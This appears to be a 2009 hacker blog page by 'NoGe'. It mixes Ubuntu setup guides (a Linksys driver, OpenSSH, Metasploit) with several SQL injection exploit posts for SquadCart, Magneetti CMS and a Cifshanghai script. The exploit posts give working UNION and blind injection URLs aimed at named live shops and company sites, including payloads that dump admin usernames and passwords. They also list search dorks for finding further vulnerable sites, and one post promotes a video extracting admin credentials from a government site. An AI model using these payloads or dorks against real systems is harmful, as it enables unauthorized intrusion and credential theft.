SquadCart SQL Injection Vuln  

Saturday, May 30, 2009


[o] SquadCart 7.0 and 5.1 SQL Injection Vulnerability

Software : SquadCart version 7.0 and 5.1
Vendor : http://thewebsquad.net/

Author : NoGe

[o] Vulnerable file
product_view.php

[o] Exploit
http://localhost/[path]/product_view.php?proid=[SQL]

[o] Proof Of Concept
http://shoveabitch.com/shove-a-bitch-t-shirts/SquadCart/product_view.php?prodid=326+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password),1,2,3+from+info_users--

[o] Dork
"Powered by acap" or inurl:squadcart

[o] Note
private shop script again. -_-
if there is no result or error show, you need to view page source

Read More...

AddThis Social Bookmark Button
Links to this post


Magneetti CMS Blind SQL Injection Vuln  

Thursday, May 28, 2009

[o] Magneetti CMS Blind SQL Injection Vulnerability
Software : Magneetti CMS
Vendor : http://www.muuntamo.com/

Author : NoGe

[o] Vulnerable file
main.php

[o] Exploit
http://localhost/[path]/main.php?id=[SQL]

[o] Proof Of Concept
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=5
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=4



[o] Dork
"Powered by cifshanghai"

[o] Note
this is a private script

Read More...

AddThis Social Bookmark Button
Links to this post


Magneetti CMS Blind SQL Injection Vuln  

[o] Magneetti CMS Blind SQL Injection Vulnerability
Software : Magneetti CMS
Vendor : http://www.muuntamo.com/

Author : NoGe

[o] Vulnerable file
main.php

[o] Exploit
http://localhost/[path]/main.php?id=[SQL]

[o] Proof Of Concept
http://www.muuntamo.com/main.php?id=18 and substring(@@version,1,1)=5 << TRUE
http://www.muuntamo.com/main.php?id=18 and substring(@@version,1,1)=4 << FALSE

http://www.koiranenbros.net/main.php?id=27 and substring(@@version,1,1)=5 << TRUE
http://www.koiranenbros.net/main.php?id=27 and substring(@@version,1,1)=4 << FALSE

http://www.soilituote.fi/main.php?id=2 and substring(@@version,1,1)=5 << TRUE
http://www.soilituote.fi/main.php?id=2 and substring(@@version,1,1)=4 << FALSE

[o] Dork
"Powered by Magneetti"

[o] Note
shit i got a private script again. -_-

Read More...

AddThis Social Bookmark Button
Links to this post


UEFA Champions League Final 2009  

Wednesday, May 27, 2009




[>o<] champions league final 2009 [>o<]  # barcelona vs man. united  # 27 may 2009 - 20.45 - roma time # 28 may 2009 - 01.45 - jakarta time # 28 may 2009 - 03.45 - papua time 

Read More...

AddThis Social Bookmark Button
Links to this post


How to install Linksys WUSB54G ver.4 driver on ubuntu 8.10  

Tuesday, May 26, 2009



[o] first of all install ndiswrapper and ndiswrapper-utils-1.9

# apt-get install ndiswrapper-common
# aptitude install ndiswrapper-utils-1.9

[o] or you can install it manually by download from here

# make distclean
# make
# make install

[o] now download WUSB54G latest driver. you can download it from linksys or nodevice

[o] driver extention will be .exe so you must open with wine and extract it

[o] after extract it, find the WUSB54Gv4 directory [ use konsole on this action ]

[o] for example if you extract it into home directory than go to home directory

# cd /home/noge/wireless/WUSB54Gv4_20050321/Drivers/WUSB54Gv4

[o] now run ndiswrapper and make sure there is no error messages

# ndiswrapper -v
# ndiswrapper -i rt2500usb.inf
# depmod -a
# modprobe ndiswrapper
# ndiswrapper -m

[o] now we'll see list of installed driver

# ndiswrapper -l

[o] if it show an alternative driver (rt2570) you must add it into blacklist

[o] edit "/etc/modprobe.d/blacklist" and add "blacklist rt2570"

[o] restart your system

[o] if it doesnt work, edit "/etc/modprobe.d/ndiswrapper" change "wlan0" to "rausb1"

[o] restart again.. :)

[o] documentation

# http://ubuntuforums.org/
# http://www-id.linksys.com/
# http://google.co.id/



./NoGe

Read More...

AddThis Social Bookmark Button
Links to this post


Cifshanghai Script SQL Injection Vuln  

Tuesday, May 19, 2009

[o] Cifshanghai Script SQL Injection Vulnerability
Software : Cifshanghai Script
Vendor : http://www.
cifshanghai.com/
Author : NoGe

[o] Vulnerable file
new.php

[o] Exploit
http://localhost/[path]/new.php?id=[SQL]

[o] Proof Of Concept
http://www.feidamotohelmet.com/new.php?id=-26%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(name,0x3a,password),8%20from%20fk_admin--

[o] Dork
"Powered by cifshanghai"

[o] Note
this is a private script

Read More...

AddThis Social Bookmark Button
Links to this post


How to install OpenSSH Server on ubuntu 8.10  

Friday, May 15, 2009


1. openssh server is not installed by default on ubuntu 8.10 so use this command to install it

root@ubuntu:~# apt-get install openssh-server

2. view the sshd_config on /etc/ssh/sshd_config make sure it has configure correctly

root@ubuntu:~# cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM yes

3. if the service not started, use this command to start openssh server

root@ubuntu:~# /etc/init.d/ssh start

4. you can use this command to stop openssh server

root@ubuntu:~# /etc/init.d/ssh stop

5. or you can restart it

root@ubuntu:~# /etc/init.d/ssh restart

6. documentation

http://www.openssh.com/
http://en.wikipedia.org/wiki/OpenSSH


Read More...

AddThis Social Bookmark Button
Links to this post


How to install metasploit on ubuntu 8.10  



1. install all file or packages that support ruby

root@ubuntu:~# apt-get install build-essential ruby libruby rdoc
libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby
libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev irb
subversion

2. download ruby gem

root@ubuntu:~# wget http://rubyforge.org/frs/download.php/11289/rubygems-1.3.3.tgz

3. extract it

root@ubuntu:~# tar -xvzf rubygems-1.3.3.tgz

4. goto ruby gem directory

root@ubuntu:~# cd rubygems-1.3.3

5. run the setup

root@ubuntu:~# ruby setup.rb

6. install gem rails

root@ubuntu:~# gem install rails 2.3.2

7. download metasploit framework

root@ubuntu:~# svn co http://metasploit.com/svn/framework3/trunk/ metasploit

8. goto metasploit directory

root@ubuntu:~# cd metasploit

9. update metasploit

root@ubuntu:~# svn up

10. run metasploit

root@ubuntu:~# ./msfconsole

11. documentation

http://metasploit.com/
http://rubygems.org/
http://rubyforge.org/
http://rubyonrails.org/
http://oonboy.blogspot.com/


Read More...

AddThis Social Bookmark Button
Links to this post


Just a lil SQL Injection video  

Monday, May 4, 2009

this video show how to get admin username and password.

target on this video is one of indonesian goverment site.
please dont deface or change anything inside it.
admin has been notify.

i dont take any responsibility for any damage!! stay secure dude.. lolz


download the video here




./NoGe

Read More...

AddThis Social Bookmark Button
Links to this post


[d]esign by Amanda [e]dited by NoGe